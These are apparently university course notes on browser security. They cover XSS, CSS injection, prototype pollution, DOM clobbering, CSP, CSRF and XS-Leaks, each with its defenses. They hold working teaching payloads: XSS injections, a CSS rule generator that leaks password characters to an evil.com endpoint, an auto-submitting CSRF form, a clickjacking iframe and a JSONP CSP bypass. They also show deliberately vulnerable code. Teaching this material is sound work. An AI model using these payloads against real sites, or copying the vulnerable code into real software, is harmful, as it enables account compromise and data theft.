Web Browser#

Let’s cover some of the attacks and defenses that make up the security landscape inside the web browser — the WWW client.

Browser threat model (almost a refresher)#

Browsers load websites over HTTP. Websites are made out of HTML, CSS, and JavaScript1.

Out of those three, JavaScript is the most interesting, because it’s a full programming language with access to everything the website itself can see. The browser maintains security boundaries between websites following the Same Origin Policy — an origin is the triplet of protocol (https), host (kam.mff.cuni.cz), and port (443) — meaning JavaScript on https://evil.com can’t access cookies or documents belonging to https://internet-banking.com.

So, the ultimate goal of an attacker is to somehow execute JavaScript in https://internet-banking.com’s context anyway, usually by abusing some vulnerability in the target website. Or if they can’t do that, well then it might be nice to at least leak some data from that site.

Even just a leak that allows JavaScript running on https://evil.com to see whether the browser is signed in as a specific user on https://social-network.com might be a valid security issue.

Sites#

Although the origin is the main security boundary, some things in browsers have looser access control, based on sites. For example, authorization.cuni.cz is allowed to store cookies accessible by the whole of *.cuni.cz (where * is any subdomain) by setting cuni.cz as the domain on the specific cookies it wants to share. cuni.cz is the site of authorization.cuni.cz, but also of a.cuni.cz, b.cuni.cz, etc. However, it cannot set cookies with the domain muni.cz, as that could be potentially dangerous2.

Pages that share a site, like all the ones on cuni.cz, are considered “friendly”: the level of isolation between them is weaker, and some mitigations don’t apply between them.

How do you tell if two pages are same-site? Two hosts belong to the same site if they share the same registrable domain. A registrable domain is the eTLD (effective top-level domain) plus one label on top of that. Domain names like cuni.cz (cz is the TLD, cuni is the +1) or sijisu.eu are registrable domains.

However, consider GitHub Pages, where you get a YOUR_USERNAME.github.io domain for your website. This would mean that unrelated and untrusted people share a site (github.io), and thus have a weaker security boundary between them. To fix this, eTLDs are defined in an openly accessible public suffix list, to which anyone can contribute and which browsers use to determine registrable domains. And indeed, github.io is present there:

// GitHub, Inc.
// Submitted by Patrick Toomey <security@github.com>
github.app
githubusercontent.com
githubpreview.dev
github.io

Let’s see if you can find out which .cz domains are eTLDs.
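The same-site check can be sketched in a few lines of JavaScript. This is a simplified model with a tiny hard-coded excerpt of the public suffix list — real browsers consult the full list:

```javascript
// Simplified same-site check. PUBLIC_SUFFIXES is a tiny hard-coded
// excerpt; real browsers use the full public suffix list.
const PUBLIC_SUFFIXES = new Set(["cz", "eu", "io", "com", "github.io"]);

// Registrable domain = the longest matching public suffix, plus one label.
function registrableDomain(host) {
    const labels = host.split(".");
    for (let i = 0; i < labels.length - 1; i++) {
        const suffix = labels.slice(i + 1).join(".");
        if (PUBLIC_SUFFIXES.has(suffix)) {
            return labels.slice(i).join(".");
        }
    }
    return host;
}

function sameSite(hostA, hostB) {
    return registrableDomain(hostA) === registrableDomain(hostB);
}

registrableDomain("kam.mff.cuni.cz");          // → "cuni.cz"
sameSite("alice.github.io", "bob.github.io");  // → false, github.io is an eTLD
```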

Attack: Cross Site Scripting — XSS#

Cross-Site Scripting (XSS — the abbreviation CSS was already taken by Cascading Style Sheets) is more of a final effect than a specific vulnerability. It is the ability to force a website to execute attacker-controlled JavaScript or, more generally, to execute JavaScript in the security context of another site/origin. There are a few fundamentally different ways to achieve this, but the most common one is some type of injection.

Reflected XSS#

Consider the following web app:

@app.route("/greet")
def greet():
    name = request.args.get('name', 'World')
    return f"<h1>Hello, {name}!</h1>"

If we make a request to /greet?name=Pitfalls, we are greeted with Hello, Pitfalls!.

But what if we try to inject HTML, and with that JavaScript?

If we make a request to /greet?name=<script>alert(window.origin)</script>, the final content of the page which is sent to the web browser is this:

<h1>Hello, <script>alert(window.origin)</script>!</h1>

The browser cannot tell the difference between the user-provided string and the rest of the HTML page, so it will execute the JavaScript!

alert() is a function that displays a browser popup with provided content.

Injections like this can be present not only in plain HTML, like in this case, but also in HTML attributes, like:

<input name="username" value="INJECTION">

If we substitute "><script>alert("pwned")</script> as the INJECTION we get:

<input name="username" value=""><script>alert("pwned")</script>">

Defense: Sanitization#

To mitigate reflected XSS, developers need to properly escape the user-controlled parts of the content. Sanitization can be done by HTML-encoding the <, >, ", ', and & characters before displaying user-controlled content on the page:

< becomes &lt;
> becomes &gt;
" becomes &quot;
' becomes &apos;
& becomes &amp;
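A minimal escaping helper implementing the table above might look like this in JavaScript (note the order: & has to be escaped first, otherwise the ampersands introduced by the other replacements would be double-encoded):

```javascript
// Escape the five HTML-significant characters. '&' must go first,
// or the entities produced by the later replacements get mangled.
function escapeHtml(input) {
    return input
        .replace(/&/g, "&amp;")
        .replace(/</g, "&lt;")
        .replace(/>/g, "&gt;")
        .replace(/"/g, "&quot;")
        .replace(/'/g, "&apos;");
}

escapeHtml('<script>alert(1)</script>');
// → "&lt;script&gt;alert(1)&lt;/script&gt;"
```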

Many frameworks and templating libraries, such as Jinja2 in Flask, do this automatically. But it’s wise to check that they are really doing it properly :)

After escaping, the examples above become harmless:

<h1>Hello, &lt;script&gt;alert(window.origin)&lt;/script&gt;!</h1>
<input name="username" value="&quot;&gt;&lt;script&gt;alert(&quot;pwned&quot;)&lt;/script&gt;">

Stored XSS#

This follows the same principle as reflected XSS, but it has a bigger impact. In stored XSS, the attacker’s payload is stored persistently (e.g., in a database) and triggered every time someone views the content containing it.

A good example of this type of attack is the 2014 TweetDeck XSS worm:

A stored XSS vulnerability in TweetDeck — a Twitter (now X) client — allowed the payload to execute. The payload auto-clicked the retweet button on the tweet itself, making it spread. Before TweetDeck fixed the vulnerability, the tweet got over 80k retweets.

Or the 2005 MySpace XSS worm, which ended with an arrest.

The same sanitization techniques also apply here.

DOM-based#

XSS can also be present in contexts other than the browser directly rendering content sent from the server.

Nowadays, websites fetch content using APIs and then render the content dynamically.

There are a number of ways to do that, and some of them are vulnerable to XSS — they are XSS sinks.

The OG way to update content dynamically is the document.write function, which writes its argument into the document and reparses it:

document.write('This is <script>...</script>')

The commonly used way now is the innerHTML property, which sets the child tree of an HTML node to a new value parsed from the given string:

document.body.innerHTML = "This is HTML <i>and there can be injections</i>";

Even though <script> tags added by innerHTML don’t execute, we can execute JS anyway using one of the many on* handlers, like:

document.body.innerHTML = "<img src=\"nonexistent.png\" onerror=\"alert(window.origin)\">";

The image content will fail to load and the onerror handler will run, executing alert(window.origin).

Other XSS sinks include the eval function, which evaluates JavaScript dynamically, and — believe it or not — the window.location property, which can be used to redirect users to a new location from JavaScript. Browsers, for historical reasons, support the javascript: scheme, which can be used to execute JavaScript in the current context:

window.location = "javascript:alert(window.origin)"

This will again trigger a popup.

Defense: Sanitization#

Instead of innerHTML, developers should use innerText and createElement to avoid reparsing HTML where possible, or employ escaping, similarly to the reflected XSS case above.

Of course, nowadays a lot of web applications use frontend frameworks, which usually do things securely when used properly — but it’s not wise to trust them entirely, and it’s advisable to take special care with custom features. For example, URL parameter parsing and handling is a common culprit.

There are cases where some form of HTML formatting is desirable, but XSS is still unwanted. Take a blogging platform, where users write blogposts and want to add formatting, images, etc.

For this, semantics-aware sanitization can be used: all dangerous content is removed from the HTML while the harmless parts are kept. A perhaps counterintuitive best practice is to do this sanitization directly in the web browser. Because HTML is very complex, parser differentials are a common occurrence. Doing the sanitization in the browser means the browser’s own HTML parser is used and, in the ideal case, this eliminates all parsing inconsistencies and produces truly safe HTML3.

There is a push to add a standardized API to browsers for this, but in the meantime the DOMPurify library is the industry standard for HTML sanitization.

Dirty, before sanitization:

<b>This will stay here</b>

<script>hahaha</script>
<img src="nonexistent.png" onerror="alert()">

Clean, after DOMPurify sanitization (DOMPurify.sanitize(dirty)):

<b>This will stay here</b>


<img src="nonexistent.png">

You can play around with it!

DOM vulnerabilities: Bonus round#

Here are a few extra techniques. They show that even when you cannot directly inject JS into the page, bad things can still happen under the right conditions. Feel free to skip this section and continue with “Defense: Content Security Policy”.

Attack: CSS injection#

CSS injection can be used to exfiltrate data from pages, even when JavaScript execution is not possible. While CSS cannot execute code, it can be used to selectively load external resources based on page content.

Consider a scenario where an attacker can inject CSS into a page (perhaps through a style attribute or a CSS file). They can use CSS selectors to target specific content and trigger HTTP requests:

input[name="password"][value^="a"] {
    background: url("https://evil.com/leak?token=a");
}
input[name="password"][value^="b"] {
    background: url("https://evil.com/leak?token=b");
}
/* ... and so on for each character */

This CSS will make the browser send a request to the attacker’s server only when the password starts with a specific character. By iterating through all possible characters, an attacker can reconstruct the entire password character by character.
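In practice the attacker generates one rule per candidate character and iterates. A sketch of such a generator (the https://evil.com/leak endpoint is the attacker’s logging server from the example above):

```javascript
// Generate one exfiltration rule per candidate character, extending an
// already-leaked prefix. The attacker's server logs which URL gets hit.
function exfilRules(alphabet, knownPrefix = "") {
    return alphabet
        .map(ch => {
            const guess = knownPrefix + ch;
            return `input[name="password"][value^="${guess}"] {\n` +
                   `    background: url("https://evil.com/leak?token=${encodeURIComponent(guess)}");\n` +
                   `}`;
        })
        .join("\n");
}
```

Each round, the character whose URL gets requested is appended to the known prefix and freshly generated CSS is injected again.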

Attack: Prototype Pollution#

Prototype pollution is a JavaScript-specific vulnerability that occurs when processing JSON objects (or even other structures) and recursively merging them.

In JavaScript, (almost) everything is an object. Plain objects inherit from the shared Object.prototype, and if you set a property on that prototype, all of them inherit it.

Consider an application that recursively merges user-provided JSON data with an existing object:

function merge(target, source) {
    for (let key in source) {
        if (typeof source[key] === 'object') {
            if (!target[key]) target[key] = {};
            merge(target[key], source[key]);
        } else {
            target[key] = source[key];
        }
    }
}

let settings = {darkmode: true};
let parsedUserInput = JSON.parse(userInput);
merge(settings, parsedUserInput);

An attacker can exploit this by injecting __proto__ (or constructor.prototype) into their JSON payload:

{
    "__proto__": {
        "admin": true
    }
}

After the recursive merge, the admin property is added to Object.prototype, meaning all objects in the application will now have admin: true:

if (user.admin) {
    eval(userProvidedCode); // Oops! This now executes for everyone
}

The main mitigation is to avoid using JS objects for dictionaries — modern JS has the Map built-in type. If you really need objects, use Object.create(null), avoid recursive merging of untrusted data, or use libraries that specifically check for prototype pollution (and keep them updated!).
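If recursive merging of untrusted data can’t be avoided, one common hardening (a sketch, not a substitute for Map or Object.create(null)) is to skip the keys that can reach the prototype chain:

```javascript
// Hardened merge: refuses to follow the keys that can reach the
// prototype chain. Recurses only into non-null sub-objects.
const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

function safeMerge(target, source) {
    for (const key of Object.keys(source)) {
        if (FORBIDDEN_KEYS.has(key)) continue; // drop dangerous keys
        const value = source[key];
        if (typeof value === "object" && value !== null) {
            if (typeof target[key] !== "object" || target[key] === null) {
                target[key] = {};
            }
            safeMerge(target[key], value);
        } else {
            target[key] = value;
        }
    }
    return target;
}
```

With this version, the `{"__proto__": {"admin": true}}` payload from above is silently dropped instead of polluting Object.prototype.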

Note: this affects pretty much all prototype-based languages in some form, including on the server.

Attack: DOM clobbering#

DOM clobbering is a technique that exploits how browsers historically create global JavaScript objects for certain HTML elements with id or name attributes.

For historical reasons, when an HTML element has an id attribute, the browser automatically creates a global JavaScript variable with that name, referencing the element:

<a id="debug"></a>
<script>
    console.log(window.debug); // Logs the <a> element
</script>

This behavior can be exploited when JavaScript code uses possibly undefined global variables without properly validating their type. Consider this vulnerable code:

<script>
    if (window.debug !== undefined) {
        eval(debug.cmd);
    }
</script>

The developer might have intended debug to be a conditionally inserted configuration object with a cmd property. However, an attacker can inject HTML to clobber the debug variable (notice, this is just HTML, no JavaScript, so this can bypass various filters):

<a id="debug"></a>
<a id="debug" name="cmd" href="javascript:alert(1)"></a>

When multiple elements share the same id, the browser creates an HTMLCollection. The second element with name="cmd" becomes accessible via debug.cmd. Since anchor elements’ href attribute can be accessed as a string, eval(debug.cmd) will execute the JavaScript in the href!

Mitigation#

To prevent DOM clobbering:

  • Avoid checking global variables directly; use namespacing or modules
  • When necessary, use strict checking, including types: if (window.debug && typeof debug.cmd === 'string')

Defense: Content Security Policy#

Content Security Policy (CSP) is a browser security mechanism designed to control which resources a web page can load and execute. It was originally developed to mitigate content injection vulnerabilities like XSS, but nowadays it serves many different purposes:

  • Restricting which scripts, styles, images, and other resources can be loaded
  • Controlling framing capabilities — who can iframe your page
  • Blocking mixed content (HTTP resources on HTTPS pages)
  • Restricting targets of form submissions
  • Restricting navigations

The CSP is sent by the server via the Content-Security-Policy HTTP header and is enforced by the browser.

How CSP works#

CSP uses directives to specify allowlists of permitted sources for different resource types (anything not explicitly allowed is blocked). Here are some key directives:

script-src — controls which sources can load JavaScript:

Content-Security-Policy: script-src https://trusted.com

This would only allow scripts from https://trusted.com to execute. Scripts from any other origin, or inline scripts, would be blocked.

You can use various source expressions:

  • Specific URLs: script-src https://example.com
  • 'unsafe-inline' — allows inline <script> tags and event handlers (defeats XSS protection!)
  • 'unsafe-eval' — allows eval() and similar dynamic code evaluation
  • 'nonce-RANDOM' — allows scripts with a matching nonce attribute: <script nonce="RANDOM">...</script>
  • 'sha256-HASH' — allows scripts whose content matches the specified hash

For example:

Content-Security-Policy: script-src 'nonce-aaaaaaaa'

Then in the HTML:

<script nonce="aaaaaaaa">
    // This script will execute
</script>

<script>
    // This script will be blocked, no XSS \o/
</script>

The nonce should be randomly generated for each page load and unpredictable to attackers.

The 'strict-dynamic' keyword is particularly interesting — it allows scripts that were loaded by already-trusted scripts to also be trusted, propagating trust dynamically. This makes CSP more compatible with modern JavaScript frameworks.

style-src — similar to script-src, but for CSS stylesheets.

default-src — fallback for any resource types not explicitly specified. If you set default-src 'self', all resources must come from the same origin unless overridden by more specific directives.

report-uri (or the newer report-to) — specifies where the browser should send reports when CSP violations occur. This is useful for detecting attacks or debugging CSP misconfigurations:

Content-Security-Policy: script-src 'self'; report-uri /csp-violations

Example policy#

A strict CSP policy might look like:

Content-Security-Policy:
    default-src 'none';
    script-src 'nonce-RANDOM' 'strict-dynamic';
    style-src 'self';
    img-src 'self' https:;
    report-uri /csp-report

This policy:

  • Blocks everything by default
  • Only allows scripts with the correct nonce (and scripts they load)
  • Allows styles from same origin
  • Allows images from same origin or any HTTPS source
  • Reports violations to /csp-report

When using CSP, here are some best practices to follow:

Disable iframing if you don’t need it. If your website isn’t meant to be embedded in iframes, you should explicitly prevent it. This protects against clickjacking attacks, where an attacker overlays your page in an invisible iframe and tricks users into clicking things they didn’t intend to.

For example, imagine an attacker creates evil.com with:

<iframe src="https://internet-banking.com/transfer" style="opacity: 0.0001; position: absolute; top: 0; left: 0;"></iframe>
<button style="position: absolute; top: 200px; left: 300px;">Click here for free money!</button>

The victim thinks they’re clicking the attacker’s button, but they’re actually clicking the “Confirm Transfer” button on the nearly-invisible banking iframe underneath. This is called “Clickjacking”.

To prevent this, use the frame-ancestors directive:

Content-Security-Policy: frame-ancestors 'none'

This completely prevents your page from being embedded in any iframe. If you need to allow specific sites to iframe your page, you can whitelist them:

Content-Security-Policy: frame-ancestors 'self' https://trusted-partner.com

Alternatively, you can use the older X-Frame-Options header, which has broader browser support but is less flexible:

X-Frame-Options: DENY

or

X-Frame-Options: SAMEORIGIN

Disable everything that you don’t need. Because it won’t hurt you. Content-Security-Policy: default-src 'self' is a good starting point.

Use CSP Evaluator to check your policy. Google provides a helpful tool at https://csp-evaluator.withgoogle.com/ that analyzes your CSP and highlights potential weaknesses or bypasses.

Limitations and bypasses#

While CSP is a powerful defense-in-depth mechanism, it’s not a silver bullet.

It requires careful configuration and can break legitimate functionality. A policy containing 'unsafe-inline' or 'unsafe-eval' significantly weakens the protection (so avoid those keywords whenever possible).

Also, while some script sources might appear trusted, they can be malicious.

For example, the policy of:

Content-Security-Policy: script-src https://google.com

This might appear legitimate — until you learn that google.com hosts various APIs and JavaScript libraries, including Google’s search-suggestion API, which supports JSONP (JSON with Padding). JSONP is a technique of wrapping data in a JS function call, used back in the day to fetch data cross-origin (different, better methods are available now, so please don’t use it).

JSONP allows specifying a callback function, so when we query:

https://www.google.com/complete/search?client=chrome&q=1&jsonp=alert(1)//

We get this response:

alert(1)//(["1",["1001 her","1. ...

When this is loaded as a script, it will execute alert(1), effectively giving an attacker arbitrary JavaScript execution despite the seemingly trusted domain!

This is why even seemingly trusted domains can be dangerous in CSP. The attacker doesn’t need to compromise Google — they just need to find an endpoint that reflects user input in executable JavaScript, or directly host their script.

Trusted Types#

Trusted Types is a browser API that works together with CSP to prevent DOM-based XSS vulnerabilities at their direct triggers — the dangerous sinks.

When Trusted Types are enabled via CSP, dangerous DOM APIs (like innerHTML, eval, document.write, etc.) will only accept special Trusted Type objects instead of raw strings. Any attempt to pass a regular string to these sinks will throw an exception.

First, enable Trusted Types via CSP:

Content-Security-Policy: require-trusted-types-for 'script'; trusted-types myPolicy;

Now, attempting to use a dangerous sink with a string will fail:

// This will throw an error!
document.body.innerHTML = "<div>Hello</div>";

To use these sinks, you must create Trusted Types through policies:

// Create a policy
const policy = trustedTypes.createPolicy('myPolicy', {
    createHTML: (string) => {
        // Sanitize the string here
        return DOMPurify.sanitize(string);
    }
});

// Now this works
const trusted = policy.createHTML("<div>Hello</div>");
document.body.innerHTML = trusted;

The key insight is that sanitization logic is centralized in the policy. Instead of developers remembering to sanitize at every sink usage, they must go through a policy that enforces sanitization.

Attack: Cross Site Request Forgery — CSRF#

Cross-Site Request Forgery (CSRF) is a vulnerability where an attacker tricks a victim’s browser into making unwanted requests to a website where the victim is authenticated. This works because, for historical reasons, browsers automatically attach cookies to requests — even when those requests originate from a different site.

Consider https://internet-banking.com with an API endpoint to transfer money:

POST /api/transfer
amount=1000&to=attacker_account

If the victim is logged into their bank account, their session cookie is stored in the browser. Now, when the browser makes a request to internet-banking.com, it automatically includes the session cookie — even if that request originates from evil.com.

This might be useful for legitimate cross-site scenarios — like putting a form on your site that submits its data to some unified form processor, such as a forum — but it opens the door to CSRF attacks.

Attack flow#

  1. The victim is authenticated on internet-banking.com (they have a valid session cookie)
  2. The victim visits the attacker’s website at evil.com
  3. The page at evil.com contains an HTML form that’s prefilled with a malicious request:
<form id="csrf-form" action="https://internet-banking.com/api/transfer" method="POST">
    <input type="hidden" name="amount" value="1000">
    <input type="hidden" name="to" value="attacker_account">
</form>
<script>
    document.getElementById('csrf-form').submit();
</script>
  4. The form is automatically submitted via JavaScript without the user realizing
  5. The victim’s session cookie for internet-banking.com is automatically attached to the outgoing POST request
  6. The bank’s server sees a valid session cookie and processes the transfer — the unwanted money transfer succeeds

The victim never intended to make this transfer, but from the server’s perspective, it looks like a legitimate request from an authenticated user.

Defense: SameSite cookies#

The SameSite cookie attribute tells browsers when to include cookies in cross-site requests. When setting a cookie, the server can specify:

Set-Cookie: session=abc123; SameSite=Strict

There are three possible values:

  • SameSite=Strict — The cookie is only sent in requests that originate from the same site. This provides the strongest CSRF protection, but can break legitimate flows (e.g., after following a link from an email, the user won’t appear authenticated); for APIs, though, this is ideal.
  • SameSite=Lax (now the default in modern browsers) — The cookie is sent in top-level navigations (like clicking a link), but not in cross-site subrequests (like forms, fetch requests, or images). This balances security and usability.
  • SameSite=None — The cookie is sent in all cross-site requests. This is the old default behavior and requires the Secure attribute.

With SameSite=Strict or SameSite=Lax, the CSRF attack described above would fail — the session cookie wouldn’t be attached to the cross-site POST request from evil.com.

Limitations and bypasses#

Lax mode has exceptions, as some browsers temporarily send cookies in all contexts for the first 2 minutes after they’re set. This is to support certain authentication flows that rely on cross-site POST requests, but it creates a window of possible vulnerability.

SameSite only protects against cross-site attacks, not cross-origin attacks. If an attacker controls evil.example.com, they can still forge requests to bank.example.com (same site: example.com). This is called Cross-Origin Request Forgery (CORF), and it only raises the importance of keeping nothing but trusted pages on your site.

Defense: CSRF tokens#

Because of the limitations of SameSite cookies, CSRF tokens remain an important defense mechanism. The idea is simple: include an unpredictable secret value in each form that modifies state, and verify it on the server.

Here’s how it works:

  1. When the server renders a form, it generates a random token and includes it in a hidden field:
<form action="/api/transfer" method="POST">
    <input type="hidden" name="csrf_token" value="random_unguessable_value_filled_in_by_server">
    <input type="text" name="amount">
    <input type="text" name="to">
    <button type="submit">Transfer</button>
</form>
  2. The server also stores this token in the user’s session (or in another cookie).
  3. When the form is submitted, the server checks that the token in the request matches the one in the session.
  4. If the tokens don’t match, or if the token is missing, the request is rejected.

An attacker on evil.com can forge a request, but they can’t include the correct CSRF token because they don’t know its value — it’s unique to each user session and unpredictable.

Additional best practices#

While SameSite cookies and CSRF tokens are the main way of defending against CSRF, there are some additional best practices:

  • ALWAYS use POST, PUT, DELETE for state-changing operations. Never use GET for endpoints that change state. Doing so violates the HTTP standard, breaks pre-fetching, and an attacker can just do <img src="https://internet-banking.com/api/transfer?to=attacker">.
  • Consider Authorization or custom headers when building an API that you know you will be only calling from JS.
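As an extra layer, state-changing endpoints can also reject requests whose Origin header isn’t expected. A sketch (the allowlist and function name are illustrative):

```javascript
// Reject cross-origin state-changing requests based on the Origin header.
// This complements — does not replace — SameSite cookies and CSRF tokens.
const ALLOWED_ORIGINS = new Set(["https://internet-banking.com"]);

function isStateChangeAllowed(method, headers) {
    // Safe methods must not change state, so they pass through.
    if (["GET", "HEAD", "OPTIONS"].includes(method)) return true;
    return ALLOWED_ORIGINS.has(headers["origin"]);
}
```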

Attack: XS-Leaks#

Cross-Site Leaks (XS-Leaks) are a class of vulnerabilities that exploit side-channels in web browsers to leak information across origins, even when the Same Origin Policy (SOP) is in place. Unlike XSS or CSRF, XS-Leaks don’t require executing code on the target origin or making unauthorized requests — instead, they infer information by observing indirect side channels.

Even though SOP prevents direct access to cross-origin resources, certain information is still observable: the number of frames in a window, loading events, error events, timing information, and more. Many of these need to be kept that way for compatibility.

Consider a social network at social-network.com with a search feature. When you search for a user, the page takes longer to load if there are many results, and loads quickly if there are no results.

An attacker on evil.com can exploit this timing difference to determine if a specific user exists in the victim’s friend list:

<iframe src="https://social-network.com/direct-messages/search?q=My phone number is +4201*"></iframe>
<iframe src="https://social-network.com/direct-messages/search?q=My phone number is +4202*"></iframe>
<iframe src="https://social-network.com/direct-messages/search?q=My phone number is +4203*"></iframe>

The attacker measures how long each iframe takes to load:

  • https://social-network.com/direct-messages/search?q=My phone number is +4201* ❌ fast (no results)
  • https://social-network.com/direct-messages/search?q=My phone number is +4202* ❌ fast (no results)
  • https://social-network.com/direct-messages/search?q=My phone number is +4203* ✅ slooooow (many results!)

By observing the timing, the attacker learns that the victim likely has a phone number starting with +4203.

There are many other techniques we invite you to check out.

Defending against XS-Leaks is hard#

XS-Leaks are notoriously difficult to defend against. There are countless possible attack vectors already, new techniques are discovered regularly, and the web platform’s complexity means there are still many other potential side-channels.

Although some defenses exist — like Cross-Origin-Opener-Policy (COOP) or Cross-Origin-Resource-Policy (CORP) — they are often opt-in and still incomplete (or not even supported by all browsers yet).

The difficulty is so significant that even big companies don’t accept bug reports for this class of vulnerabilities, despite their potential impact on user privacy. For example, Google has only recently started rolling out fixes and accepting XS-Leak bugs in its bug bounty program again, even though some of the first XS-Leak vulnerabilities were reported back in 2019.

The fundamental issue is that the Web platform is insecure by default. It was designed with openness and interoperability for content sharing in mind, not security for an application platform. Shifting towards secure defaults is a long process that requires breaking backward compatibility — something the web is historically reluctant to do.

TLDR#

  • Cross-Site Scripting (XSS) allows attackers to execute JavaScript on a target website by injecting malicious code:
    • XSS comes in three main forms: Reflected (user input immediately reflected in response), Stored (malicious payload persisted in database and executed on view), and DOM-based (client-side JavaScript unsafely handles input using dangerous sinks like innerHTML, eval, or document.write).
    • Defense: Sanitize and escape user input by encoding special characters (<, >, ", ', &). Use safe APIs like innerText instead of innerHTML. For rich content, use browser-based sanitization libraries like DOMPurify.
  • Content Security Policy (CSP) is a browser security mechanism that controls which resources a page can load:
    • Sent via HTTP header and enforced by the browser.
    • Use directives like script-src, style-src, default-src to allowlist permitted sources.
    • Use nonces ('nonce-RANDOM') or hashes to allow specific inline scripts while blocking injected ones.
    • frame-ancestors directive prevents clickjacking by controlling who can iframe your page.
    • Trusted Types work with CSP to prevent DOM XSS by requiring dangerous sinks to only accept special Trusted Type objects, centralizing sanitization logic.
  • Cross-Site Request Forgery (CSRF) tricks a victim’s browser into making unwanted authenticated requests to another site:
    • Exploits the fact that browsers automatically attach cookies to requests, even from different origins.
    • Defense with SameSite cookies: Set SameSite=Strict or SameSite=Lax to control when cookies are sent in cross-site requests (Lax is now the default).
    • Defense with CSRF tokens: Include unpredictable tokens in forms and verify them server-side.
    • Always use POST/PUT/DELETE for state-changing operations, never GET.
  • Cross-Site Leaks (XS-Leaks) exploit side-channels to leak information across origins without violating Same Origin Policy:
    • Attackers observe timing differences, loading events, or other indirect signals to infer sensitive information.
    • Example: XS-Search measures how long a search takes to determine if results exist.
    • Very difficult to defend against due to web platform’s design for openness over security.

Further resources#


  1. And possibly many other things, like WebAssembly. ↩︎

  2. Well, if you have evil.cuni.cz controlled by a potential attacker, this is dangerous too. See Cookie Tossing and please never set the domain attribute manually. ↩︎

  3. Of course, we live in a non-ideal world. ↩︎